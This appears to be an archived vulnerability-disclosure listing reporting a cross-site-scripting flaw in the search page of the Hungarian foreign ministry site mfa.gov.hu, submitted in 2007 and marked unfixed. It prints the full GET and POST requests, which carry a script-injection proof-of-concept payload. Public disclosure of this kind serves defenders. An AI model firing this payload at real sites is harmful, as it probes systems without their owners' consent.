Advertisements:
Security researcher kaksii, has submitted on 05/11/2007 a cross-site-scripting (XSS) vulnerability affecting mfa.gov.hu, which at the time of submission ranked 15316 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 05/11/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.
Date submitted: 05/11/2007 Date published: 05/11/2007 Fixed? Mail us!Status:  UNFIXED
Author: kaksii Domain: mfa.gov.hu Category: XSS Pagerank: 15316
URL: http://mfa.gov.hu/kum2005/Templates/Search.aspx?NRMODE=Published&NRORIGINALURL=%2Fkum%2Fhu%2Fbal%2Fs
earch%3Fb%3D1&NRNODEGUID=%7B6A7B8B97-9E10-42DB-A303-1A87DD500507%7D&NRCACHEHINT=NoModifyGuest&kereso
='%22%3E%3Cscript%3Ealert(1)%3C&b=1
POST: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=dDwxNzc0MDk1NDUzO3Q8O2w8aTw1Pjs%2BO2w8dDw7bDxpPDE%2BO2k8 NT47PjtsPHQ8O2w8aTwwPjtpPDI%2BOz47bDx0PDtsPGk8MD47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDw7bDxpPDA%2BO2k8MT47Pj tsPHQ8cDxwPGw8Q3NzQ2xhc3M7XyFTQjs%2BO2w8Y2ltZXI7aTwyPjs%2BPjs%2BO2w8aTwwPjs%2BO2w8dDxwPGw8aHJlZjs%2B O2w8L2t1bS9odS9iYWwvOz4%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjtpPDE%2BO2k8Mj47aTw0Pjs%2BO2w8dDxwPGw8aHJlZjs%2B O2w8I2xlZnRNZW51X21haW47Pj47Oz47dDxwPGw8aHJlZjs%2BO2w8I1BhZ2VDb250ZW50SG9vazs%2BPjs7Pjt0PHA8cDxsPENz c0NsYXNzO18hU0I7PjtsPGhlYWRfbWVudTtpPDI%2BOz4%2BOz47bDxpPDA%2BOz47bDx0PHA8bDxjbGFzcztjZWxscGFkZGluZz tjZWxsc3BhY2luZzs%2BO2w8aG1fdGFibGU7MDswOz4%2BO2w8aTwwPjs%2BO2w8dDw7bDxpPDA%2BO2k8MT47PjtsPHQ8cDxsPG NsYXNzOz47bDxobV8xOz4%2BOzs%2BO3Q8cDxsPGNsYXNzOz47bDxobV8yOz4%2BOzs%2BOz4%2BOz4%2BOz4%2BO3Q8O2w8aTww Pjs%2BO2w8dDw7bDxpPDE%2BO2k8Mj47aTwzPjtpPDQ%2BO2k8NT47PjtsPHQ8O2w8aTwwPjs%2BO2w8dDxwPGw8aHJlZjs%2BO2 w8L2t1bS9odS9iYWwvOz4%2BO2w8aTwwPjs%2BO2w8dDxwPHA8bDxJbWFnZVVybDtXaWR0aDtIZWlnaHQ7QWx0ZXJuYXRlVGV4dD tCb3JkZXJXaWR0aDtfIVNCOz47bDwva3VtMjAwNS9waWNzLzIwMDYvaGVhZGVyX2J1aWxkLmpwZzsxPDE1MnB4PjsxPDc2cHg%2B O1Zpc3N6YSBhIGbDtW9sZGFscmE7MTwwcHg%2BO2k8NDE2Pjs%2BPjtwPGw8dnNwYWNlO2hzcGFjZTthbGlnbjs%2BO2w8MDswO3 RvcDs%2BPj47Oz47Pj47Pj47dDw7bDxpPDA%2BOz47bDx0PHA8bDxocmVmOz47bDw7Pj47bDxpPDA%2BOz47bDx0PHA8cDxsPENz c0NsYXNzO0ltYWdlVXJsO1dpZHRoO0hlaWdodDtBbHRlcm5hdGVUZXh0O0JvcmRlcldpZHRoO18hU0I7PjtsPGNvbHVtblNlcGFy YXRvcjsva3VtMjAwNS9waWNzLzIwMDYvMC5naWY7MTwxcHg%2BOzE8NXB4PjtcZTsxPDBweD47aTw0MTg%2BOz4%2BO3A8bDx2c3 BhY2U7aHNwYWNlO2FsaWduOz47bDwwOzA7dG9wOz4%2BPjs7Pjs%2BPjs%2BPjt0PDtsPGk8MD47PjtsPHQ8cDxsPGhyZWY7Pjts PC9rdW0vaHUvYmFsLzs%2BPjtsPGk8MD47PjtsPHQ8cDxwPGw8SW1hZ2VVcmw7V2lkdGg7SGVpZ2h0O0FsdGVybmF0ZVRleHQ7Qm 9yZGVyV2lkdGg7XyFTQjs%2BO2w8L2t1bTIwMDUvcGljcy8yMDA2L2hlYWRlcl92aWV3Mi5qcGc7MTwzMDVweD47MTw3NnB4PjtW aXNzemEgYSBmw7VvbGRhbHJhOzE8MHB4PjtpPDQxNj47Pj47cDxsPHZzcGFjZTtoc3BhY2U7YWxpZ247PjtsPDA7MDt0b3A7Pj4% 2BOzs%2BOz4%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxwPGw8aHJlZjs%2BO2w8Oz4%2BO2w8aTwwPjs%2BO2w8dDxwPHA8bDxD c3NDbGFzcztJbWFnZVVybDtXaWR0aDtIZWlnaHQ7QWx0ZXJuYXRlVGV4dDtCb3JkZXJXaWR0aDtfIVNCOz47bDxjb2x1bW5TZXBh cmF0b3I7L2t1bTIwMDUvcGljcy8yMDA2LzAuZ2lmOzE8MXB4PjsxPDVweD47XGU7MTwwcHg%2BO2k8NDE4Pjs%2BPjtwPGw8dnNw YWNlO2hzcGFjZTthbGlnbjs%2BO2w8MDswO3RvcDs%2BPj47Oz47Pj47Pj47dDw7bDxpPDA%2BOz47bDx0PHA8bDxocmVmOz47bD wva3VtL2h1L2JhbC87Pj47bDxpPDA%2BOz47bDx0PHA8cDxsPEltYWdlVXJsO1dpZHRoO0hlaWdodDtBbHRlcm5hdGVUZXh0O0Jv cmRlcldpZHRoO18hU0I7PjtsPC9rdW0yMDA1L3BpY3MvMjAwNi9jYXJkX2ZsYWcyLmpwZzsxPDMwM3B4PjsxPDc2cHg%2BO1Zpc3 N6YSBhIGbDtW9sZGFscmE7MTwwcHg%2BO2k8NDE2Pjs%2BPjtwPGw8dnNwYWNlO2hzcGFjZTthbGlnbjs%2BO2w8MDswO3RvcDs% 2BPj47Oz47Pj47Pj47Pj47Pj47Pj47Pj47Pj47Pj47dDw7bDxpPDA%2BOz47bDx0PDtsPGk8Mj47PjtsPHQ8O2w8aTwwPjtpPDI% 2BO2k8Mz47aTw1Pjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxLZXJlc2V0dCBraWZlamV6w6lzOjs%2BPjs%2BOzs%2BO3Q8cDxwPG w8VGV4dDs%2BO2w8S2VyZXPDqXM7Pj47Pjs7Pjt0PHA8cDxsPFRleHQ7PjtsPEEgdGFsw6FsYXRvayBrw7Z6w7Z0dCBjc2FrIGF6 b2sgYXogb2xkYWxhayBqZWxlbm5layBtZWcsIG1lbHlla2JlbiBheiDDtnNzemVzIGtlcmVzZXR0IHN6w7Mgc3plcmVwZWwuIElk w6l6xZFqZWxlayBoYXN6bsOhbGF0w6F2YWwga2lmZWplesOpc2VrcmUgaXMga2VyZXNoZXQuOz4%2BOz47Oz47dDxwPGw8VmlzaW JsZTs%2BO2w8bzxmPjs%2BPjtsPGk8MD47PjtsPHQ8O2w8aTwwPjtpPDE%2BO2k8Mj47PjtsPHQ8O2w8aTwxPjs%2BO2w8dDxwPH A8bDxUZXh0Oz47bDxcPFw8IEVsxZF6xZE7Pj47Pjs7Pjs%2BPjt0PDtsPGk8MT47PjtsPHQ8cDxwPGw8VGV4dDs%2BO2w8MTs%2B Pjs%2BOzs%2BOz4%2BO3Q8O2w8aTwwPjs%2BO2w8dDxwPHA8bDxUZXh0Oz47bDxLw7Z2ZXRrZXrFkSBcPlw%2BOz4%2BOz47Oz47 Pj47Pj47Pj47Pj47Pj47Pj47Pj47dDw7bDxpPDA%2BO2k8Mj47PjtsPHQ8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47bDxpPDE%2B O2k8Mz47aTw1PjtpPDc%2BO2k8OT47aTwxMT47PjtsPHQ8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47bDxpPDE%2BOz47bDx0PHA8 bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BOz4%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47bDxpPDE%2BO2k8Mz47aT w1PjtpPDc%2BO2k8OT47aTwxMT47aTwxMz47aTwxNT47aTwxNz47aTwxOT47aTwyMT47aTwyMz47aTwyNT47aTwyNz47aTwyOT47 aTwzMT47aTwzMz47aTwzNT47aTwzNz47aTwzOT47aTw0MT47aTw0Mz47PjtsPHQ8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47 dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BO3Q8cDxsPFZpc2 libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PHA8bDxWaXNpYmxlOz47bDxvPGY%2B Oz4%2BOzs%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PHA8 bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VmlzaWJsZTs%2B O2w8bzxmPjs%2BPjs7Pjt0PHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47 Oz47dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BO3Q8cDxsPF Zpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PHA8bDxWaXNpYmxlOz47bDxvPG Y%2BOz4%2BOzs%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0 PHA8bDxWaXNpYmxlOz47bDxvPGY%2BOz4%2BOzs%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47Pj47dDxwPGw8VmlzaW JsZTs%2BO2w8bzxmPjs%2BPjtsPGk8MT47PjtsPHQ8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47Pj47dDxwPGw8VmlzaWJsZT s%2BO2w8bzxmPjs%2BPjtsPGk8MT47PjtsPHQ8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47Pj47dDxwPGw8VmlzaWJsZTs%2B O2w8bzxmPjs%2BPjtsPGk8MT47aTwzPjs%2BO2w8dDxwPGw8VmlzaWJsZTs%2BO2w8bzxmPjs%2BPjs7Pjt0PHA8bDxWaXNpYmxl Oz47bDxvPGY%2BOz4%2BOzs%2BOz4%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47bDxpPDE%2BOz47bDx0PHA8bDxWaXNpYm xlOz47bDxvPGY%2BOz4%2BOzs%2BOz4%2BOz4%2BO3Q8cDxsPFZpc2libGU7PjtsPG88Zj47Pj47Oz47Pj47Pj47Pj47Pl2kY1ew OS8RZk%2B0xYSawABTKyn0&kereso=&SearchControl1%3AtxtSearchTerm=%27%22%3E%3Cscript%3Ealert%281%29%3C%2 Fscript%3E&SearchControl1%3AbtnSearch=Keres%C3%A9s
Click here to view the mirror
Buy XSS Attacks book from Amazon!
XSS Attacks
Cross Site Scripting Exploits and Defense
Buy Detecting Malice book from RSnake
Website Fraud Loss Prevention
Advertisements
Home | News | Articles | Advisories | Submit | Alerts | Links | What is XSS | About | Contact | Some Rights Reserved.